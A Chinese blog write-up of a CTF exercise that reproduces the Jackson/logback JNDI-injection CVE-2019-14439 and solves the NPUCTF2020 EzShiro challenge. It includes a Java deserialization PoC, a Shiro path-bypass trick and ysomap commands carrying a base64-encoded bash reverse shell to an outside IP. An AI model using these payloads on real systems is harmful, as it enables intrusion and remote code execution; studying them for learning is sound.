CVE-2019-14439以及[NPUCTF2020]EzShiro复现

最新推荐文章于 2024-06-15 18:15:57 发布
最新推荐文章于 2024-06-15 18:15:57 发布
阅读量4.9k 收藏 3
点赞数 5
分类专栏: ctfwp 文章标签: java 安全 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/122083077
版权

CVE-2019-14439

是由logback 引起的 jndi 注入,找不到详细分析的文章,对着网上的poc简单看了一下。

ch.qos.logback.core.db.JNDIConnectionSource这个类里

1640089832227.jpeg

1640080058330.jpeg

漏洞原理并不复杂,很清晰明了的jndi注入。

poc

package Jackson;


import com.fasterxml.jackson.databind.ObjectMapper;

import java.io.IOException;

public class logback {

    public static void main(String[] args) throws IOException, IOException {

				String json = "[\"ch.qos.logback.core.db.JNDIConnectionSource\"," +
                "{\"jndiLocation\":\"ldap://127.0.0.1:1089/Exploit\"}]";
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();
        Object o = mapper.readValue(json, Object.class);
        mapper.writeValueAsString(o);
    }

}

1640080727072.png

[NPUCTF2020]EzShiro

一开始没做出来,后来看wp知道附件有pom.xml buu似乎没给

<dependencies>
    <dependency>
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-starter-web</artifactId>
    </dependency>

    <dependency>
      <groupId>org.apache.shiro</groupId>
      <artifactId>shiro-web</artifactId>
      <version>1.5.1</version>
    </dependency>
    <dependency>
      <groupId>org.apache.shiro</groupId>
      <artifactId>shiro-spring</artifactId>
      <version>1.5.1</version>
    </dependency>
    <dependency>
      <groupId>ch.qos.logback</groupId>
      <artifactId>logback-core</artifactId>
      <version>1.2.1</version>
    </dependency>
    <dependency>
      <groupId>commons-collections</groupId>
      <artifactId>commons-collections</artifactId>
      <version>3.2.1</version>
    </dependency>
  </dependencies>

看到有logback 先是shiro的权限绕过来到/json。访问/;/json

post一个true看到Jackson

1640089703761.png

jackson+logback 应该就是CVE-2019-14439了,源码应该是用jackson对post的json数据进行反序列化

但遇到个问题,我直接打没有打通,这里好像还需要绕限制。

看了看wp,参考的是这个。文章里有提到

https://paper.seebug.org/942/#ldapgadget

1640093819476.png

应该是题目jvm版本太高了。得加载题目自带的链子,看到pom里有commons-collections

wp里直接用ysomap工具了,还没在比赛里用过这个工具,顺带学一学。

https://github.com/wh1t3p1g/ysomap

use exploit LDAPLocalChainListener
set lport 6688
use payload  CommonsCollections8
use bullet TransformerBullet
set version 3
set command 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuNzAuNDAuNS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'
run

使用这工具必须的是jdk8,并且jdk8版本不能过低

1640147973090.png

能弹成功,期末考完去研究一下工具源码

fmyyy1
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Spring Boot 的用户要注意 Jackson 反序列化漏洞!
专业的开发者“讨论”
04-23 3729
对于使用Spring Boot的用户,请注意,当前版本(2.1.7)取决于较旧的易受攻击的jackson-databind 2.9.9软件包。
CVE-2019-14287复现
weixin_42298807的博客
10-28 1191
一、 漏洞成因 管理员在sudo配置文档中用了ALL关键字造成的。 sudo权限绕过漏洞,sudo,Linux系统管理命令,允许用户在不切换环境的前提下,以其他用户的权限运行应用程序或命令。 二、 影响版本 1.8.28之前的所有版本 三、 漏洞复现 1、 查看sudo版本 sudo -V 2、 新建账户 useradd test passwd test 3、 修改sudo配置文件 vim /e...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。阿里云应急响应中心提醒Jackson用户尽快采取安全措施阻止漏洞攻击。
Web-11(41-44)-BUUCTF平台
~airrudder~
07-09 870
本篇内容 [NPUCTF2020]ReadlezPHP [NPUCTF2020]ezlogin [NPUCTF2020]ezinclude [NPUCTF2020]验证???? [NPUCTF2020]web???? [NPUCTF2020]EzShiro 上一篇 | 目录 | 下一篇 [NPUCTF2020]ReadlezPHP 直接加view-source:查看源代码: <?php #err...
shiro反序列化漏洞学习(工具+原理+复现
最新发布
heike_Ch的博客
06-15 786
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
Java Web 安全】jackson漏洞探究、利用、预防
qqchaozai的专栏
08-15 4793
前言 阿里云安全公告:2019年7月31日,阿里云应急响应中心监测到有安全研究人员披露Jackson最新反序列化远程代码执行漏洞(CVE-2019-14361和CVE-2019-14439)。同事说怎么jackson这类的json序列化库经常报漏洞,而且基本都是高危漏洞,这些漏洞到底怎么来的,jackson的开发程序员就这么不靠谱么?改不完的BUG?这篇文章就让我们走进jackson的世界,感受...
jenkins本地环境迁移至容器运行
liujiangxu
08-16 523
jenkins版本2.306因云盾检测出应急漏洞Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)【版本检测】,因此整改迁移至docker,当然按照自己习惯也可以升级新版本或者打补丁方式,操作方式不限 docker镜像 拉取镜像(拉取后版本也是2.306) [root@10.1.74.109 ~]# docker pull jenkins/jenkins:latest 创建挂载文件 [root@10.1.74.109 ~]# mkdir /home/jenkin
漏洞情报|Jackson-databind反序列化漏洞风险通告(CVE-2020-35490,CVE-2020-35491)
Gblfy_Blog
11-05 2599
反序列化漏洞
CVE-2019-11043漏洞复现-kali2020.4&win7
weixin_43867542的博客
07-19 833
漏洞名称:PHP 缓冲区错误漏洞 危害等级:中危 CVSS评分: 漏洞类型:缓冲区错误 漏洞概述: CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。该漏洞需要在nginx.conf中进行特定配置才能触发。 受影响版本 PHP 7.0 版本;PHP 7.1 版本;PHP 7.2 版本;PHP 7.3 版本 环境概述
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-2019-11708诱骗父流程浏览到任意URL。 在过去的中,我已经介绍了CVE-2019-9810的根本原因和利用文章以及相关的。 CVE-2019-11708已由公告,并...
[NPUCTF2020]EzRSA e和phi_n不互素怎么找d
学习,再学习
09-19 156
熟悉e和m在加密过程中的指数计算问题
jackson 序列化_Jackson 反序列化远程代码执行漏洞预警,腾讯御界支持检测
weixin_39782832的博客
12-02 822
【漏洞简介】近日,Jackson官方发布安全issue,披露Jackson存在最新的反序列化远程代码执行漏洞(CVE-2019-14361和CVE-2019-14379),可对6月21日披露的CVE-2019-12384漏洞绕过,成功利用可实现远程代码执行。建议Jackson的用户尽快升级至安全版本。【Jackson介绍】Jackson是一个简单基于Java应用库,Jackson可以轻松...
[NPUCTF2020]EzRSA
2er0!=O的博客
07-25 538
[NPUCTF2020]EzRSA 附件: from gmpy2 import lcm , powmod , invert , gcd , mpz from Crypto.Util.number import getPrime from sympy import nextprime from random import randint p = getPrime(1024) q = getPrime(1024) n = p * q gift = lcm(p - 1 , q - 1) e = 54722 fla
Java安全漏洞致10亿电脑处于安全威胁中
invincible_lanqi的专栏
09-30 2169
甲骨文Java软件中发现了最新的0day漏洞,这一漏洞几乎出现在所有受支持的Java版本中,通过此漏洞,黑客可在超过10亿台装有Java的 Mac和PC机上安装恶意软件与病毒。安全专家Adam Gowdiak昨天宣布,这一安全漏洞存在于Java 5、Java 6和Java 7中。计算机世界还特别指出,使用Mac OS X最新版本系统的用户同样存在这一安全问题,包括Snow Leopard 10.6
刷题记录-NPUCTF2020(web部分)
weixin_43610673的博客
05-03 4859
在buu刷了一遍,题目好顶,还剩一题EzShiro摸不出来 ReadlezPHP 禁用了右键查看源代码 view-source: 自行加上前缀即可 打开链接/time.php?source 很明显,php反序列化,通过echo b(b(b(a); 写入shell,system等被禁用,用assert(断言) <?php class HelloPhp { public $a; ...
Win7 Server 漏洞修复(CVE-2017-**、CVE-2018-**、CVE-2019-**、CVE-2012-**)
.
06-30 5208
【详解--操作 Win7 Server 漏洞修复(CVE-2017-**(MS17-010)、CVE-2018-**、CVE-2019-**、CVE-2012-**)
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-144391
07-14
你提到的 Jackson 最新反序列化漏洞是 CVE-2019-14361 和 CVE-2019-14439。这些漏洞都是与 Jackson 库中的反序列化功能相关的安全问题。 CVE-2019-14361 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据来执行任意代码。该漏洞主要影响 Jackson-databind 库的 2.9.x 版本。 CVE-2019-14439 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据来执行任意代码。该漏洞主要影响 Jackson-databind 库的 2.6.x 至 2.9.x 版本。 为了解决这些漏洞,建议开发人员尽快升级到最新版本的 Jackson-databind 库。另外,还可以考虑限制反序列化操作的使用,以减少潜在的风险。记住及时关注安全公告,并采取相应的措施来保护应用程序免受可能的攻击。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值